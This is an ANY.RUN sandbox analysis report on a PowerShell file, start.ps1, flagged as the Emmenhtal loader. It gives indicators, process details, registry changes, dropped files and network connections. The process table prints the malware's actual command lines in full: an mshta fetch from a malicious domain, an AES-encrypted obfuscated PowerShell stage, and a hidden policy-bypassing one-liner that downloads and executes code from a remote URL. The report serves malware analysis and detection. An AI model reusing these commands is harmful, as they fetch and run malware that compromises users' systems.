File name:

start.ps1

Full analysis: https://app.any.run/tasks/560c4665-6289-4b1a-b65f-c8fc98297c71
Verdict: Malicious activity
Threats:

First identified in 2024, Emmenhtal operates by embedding itself within modified legitimate Windows binaries, often using HTA (HTML Application) files to execute malicious scripts. It has been linked to the distribution of malware such as CryptBot and Lumma Stealer. Emmenhtal is typically disseminated through phishing campaigns, including fake video downloads and deceptive email attachments.

Malware Trends Tracker     >>>
Analysis date: February 08, 2025, 16:52:37
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
emmenhtal
loader
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

5FC933DA0991BBC1FF9ED94831D25759

SHA1:

19628CA8C071DCBB998926CC3E41933CBD655A8B

SHA256:

C03114B8436263E0FE11B9D102BC72E3A548C68A55F06F42029BE6A7B9BA7951

SSDEEP:

3:VSJJFISFuqpIKwRROLWPXC59dIBM/Mvn:s8SFfpIKwR0L9OM/Mvn

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6264)
      • powershell.exe (PID: 6896)
      • powershell.exe (PID: 4996)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3536)
      • powershell.exe (PID: 4996)

    • EMMENHTAL loader has been detected

      • powershell.exe (PID: 6264)

    • Changes powershell execution policy (Unrestricted)

      • mshta.exe (PID: 6480)

    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 6896)

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 6896)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4996)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 3536)
      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 6896)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 6896)

    • Application launched itself

      • powershell.exe (PID: 3536)

    • Executes script without checking the security policy

      • powershell.exe (PID: 6896)
      • powershell.exe (PID: 4996)

    • Probably obfuscated PowerShell command line is found

      • mshta.exe (PID: 6480)

    • Starts a new process with hidden mode (POWERSHELL)

      • powershell.exe (PID: 6896)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 6480)

    • Checks proxy server information

      • mshta.exe (PID: 6480)
      • powershell.exe (PID: 4996)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6896)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 6896)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 6896)

    • Disables trace logs

      • powershell.exe (PID: 4996)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
136
Monitored processes
8
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs #EMMENHTAL powershell.exe no specs mshta.exe powershell.exe no specs conhost.exe no specs powershell.exe conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3536"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\AppData\Local\Temp\start.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4996"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command Set-Item Variable:\TNX (((([Net.WebClient]::New()|Get-Member)|?{(Get-Variable _).Value.Name-clike '*nl*g'}).Name));Set-Variable R 'https://rbk.scalingposturestrife.shop/b313d4a4588bd2e7bc9ece877caba58a.png';Set-Variable 4 ([Net.WebClient]::New());&$ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).GetCommand($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Get-Member)[6].Name).PsObject.Methods|?{(Get-Variable _).Value.Name-clike '*nd*e'}).Name)( 'In*-Ex*ion', $TRUE, $TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(Get-Variable 4 -ValueOn).((Variable TNX).Value)((Variable R -ValueO)) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5096\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5320\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6264"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 . \*i*\*2\msh*e https://dns-verify-me.pro/xfiles/train.mp4C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
6480"C:\Windows\System32\mshta.exe" https://dns-verify-me.pro/xfiles/train.mp4C:\Windows\System32\mshta.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
6896"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function asfFKOT($bdnfJHpy){-split($bdnfJHpy -replace '..', '0xf7f81a39-5f63-5b42-9efd-1f13b5431005amp; ')};$DIBk=asfFKOT('2D3D681F4FC1E35203BA06186CFBEC425A507CECE7C0FC2A2B8C7D9956C98A74BA6229DBBC472CD7430C17CCAC6D7D60CA565558588BDDDA070ED649908C3DBFDA602DE56C2067F4DB5CBABA003D7B31755870FD3AA30E0D6CB97EEC2456628EF07DC64ED6A500A2C21FD9895028AE08F2C05071C318AF6CEC9B3FAFB5C299BF10BA920C0C59118CB149888313B396C137C1759EE7AE4DF4089D9B037320332C2B0A533E86A853843DD9772A8D0950ED8FED5319A1CEC6286EF1392F1C333AC783C5427EB41673150FD0E3B9FBDEB9E95C323B88AC9A01EB2A8E01CA3B108BD31CAC4460B367555F78B36D255C44F0DFFB98C2CF34DCA02EB49657E9DA575CA2205DDF657D5F366EA8F37DD9DDE5898AF513FBD983510A86995EF68A19F17AD711CB12295A967D31400C1FDF276BE4A41E9E52FBA7E4BB10D464EE902DF3D67F111DA995232108E3F0822A46F04739F5B9A07A9C08A3EA82CAA7FED5E70F825E2AE1EA533FD2503833728125AA7528A912936445BA356D8903BAC81FD09C0662C283BF002C798C43A187C2B94C50D0A285D6E2351344351FB8FD6195EDA77253411DB94B020B2751D909461BBD30ACEC48A807003B4039DDAF4014BE2B5F10B49A6A3D7546D7591B3455F37F550B231B86429E80109006D1DB217AC173DB11C49388874F0B42CE7E5D9512514F567E42E81F1F3FFF98E645D19F31ED4D8C1FFA9B29DB5E397DB1E104BFFF17C0E05DAE752BB36FDDA7BEF11BEBE3348C02991E4F9AC4CB3153B4D00BDF4AFB7045A6BCD498E85F7DB97CF7DB7278D8B832259FF10E779F73E607908BC53B579D2A8E529152CE739056D66AA4A6204FF88CD2DB33B208DE40D7410DE44B06EAC7E4CB9D8B8BFD106781DF924D108C8E9E7D7622A49F9F70797648D3783502C27BE36C5243D157F635DBCA76751934FFE69EC323C7D06C0C007EBB2EC3527E05E7491FC78344B37E207921453248DABD32FABE0CC40CA4651D50BF0D51B0C8BEEAE64EB819EB8EBE0BE9A630CCD2BDE0531EA9E7969A15CFE8C4F0F7E049FF2E81DB37FB8E17607602BF70276FA57A0CB1AF30AC2B55E09A32351B3314D824BD6960ECF2A5370B80C3E54EF71D6200335B87A4B595ED7FAD85C54DE0439D5C8BD38BC9A2D3F677D5C2B67F5FED6DE57B09F8399FFBAA0CE663032132928EC23D325F74EF462BD567D03AB0CCBB50EAB0FA1E5B774FCA674860AD512BA70B217DAEF41B589925BE9C1EC75F1579F3347E21A9FC18ECA11707B3C17C0588337B17631ABDFBBA59CDCD031E292176CF4012380459EC9C8ACD093A5BC3F99B7A6E8D71BBAF3F748046051B9F1C5AAD9968C61AFB59B597FBE9A1F3AE7086A790F697C43EA07D160CD71389EA248C95A00DA91192A3FE3782E71FE770250067230F2A8C1396E74A7705B80E7B1224005D57AC36C6282CB03C3B095F04B65050DD2DE7E30DB8C22F666FA993E9D2AF10A8CA8EA45BF865');$RiBDc=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((asfFKOT('674445447A715953714E6E7877494170')),[byte[]]::new(16)).TransformFinalBlock($DIBk,0,$DIBk.Length)); & $RiBDc.Substring(0,3) $RiBDc.Substring(3)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exemshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
6904\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
18 887
Read events
18 870
Write events
17
Delete events
0

Modification events

(PID) Process:(6480) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(6480) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(6480) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4996) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
10
Text files
8
Unknown types
0

Dropped files

PID
Process
Filename
Type
3536powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kppapp4d.wok.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136034.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
6264powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:5F303CB2454212C773212A34FEA8CBC9
SHA256:E739B96FC39686690703440DF6E1B97C16466C4CEB865B0E62C5CB84CD4008D0
6896powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_053wbhs4.w1t.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6480mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:C9BE626E9715952E9B70F92F912B9787
SHA256:C13E8D22800C200915F87F71C31185053E4E60CA25DE2E41E160E09CD2D815D4
6480mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12binary
MD5:41860C041B6764103EC5E5178CC56454
SHA256:36BD31D641F0CA683D9E8CD2569653AAD80756AF6FB03B66B9DC18137A20734F
6480mshta.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8binary
MD5:572F72DFE7C8BF9CD5ABE2D8AF160DE4
SHA256:1DC7C18A76F63A09C4216325E25C19E937DEE0CD89626657F49550790D36C896
6480mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\train[1].mp4binary
MD5:E080BFEC705B9BD0FD93791D92B2FD49
SHA256:30517FA2FB275E4E2EED484ED7C0A262AD2F20D75D5354541DEEB5B43802B5DF
4996powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ukfr2kzg.55a.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6896powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_fg1bfkic.ife.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
33
DNS requests
20
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4712
MoUsoCoreWorker.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
184.24.77.38:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6480
mshta.exe
GET
200
142.250.186.35:80
http://c.pki.goog/r/gsr1.crl
unknown
whitelisted
6480
mshta.exe
GET
200
142.250.186.35:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
1176
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6376
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
6376
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7096
backgroundTaskHost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
184.24.77.38:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
1356
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
104.126.37.171:443
www.bing.com
Akamai International B.V.
DE
whitelisted
4712
MoUsoCoreWorker.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
4712
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2212
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3976
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6480
mshta.exe
188.114.97.9:443
dns-verify-me.pro
CLOUDFLARENET
NL
unknown

DNS requests

Domain
IP
Reputation
google.com
  • 142.250.185.206
whitelisted
crl.microsoft.com
  • 184.24.77.38
  • 184.24.77.27
  • 184.24.77.7
  • 184.24.77.41
  • 184.24.77.12
  • 184.24.77.35
  • 184.24.77.11
  • 184.24.77.30
  • 184.24.77.42
whitelisted
www.bing.com
  • 104.126.37.171
  • 104.126.37.153
  • 104.126.37.154
  • 104.126.37.161
  • 104.126.37.162
  • 104.126.37.178
  • 104.126.37.163
  • 104.126.37.170
  • 104.126.37.155
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
dns-verify-me.pro
  • 188.114.97.9
  • 188.114.96.9
unknown
c.pki.goog
  • 142.250.186.35
whitelisted
login.live.com
  • 40.126.31.2
  • 40.126.31.3
  • 20.190.159.64
  • 40.126.31.73
  • 20.190.159.131
  • 20.190.159.73
  • 40.126.31.0
  • 40.126.31.129
whitelisted
go.microsoft.com
  • 23.35.238.131
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
start.ps1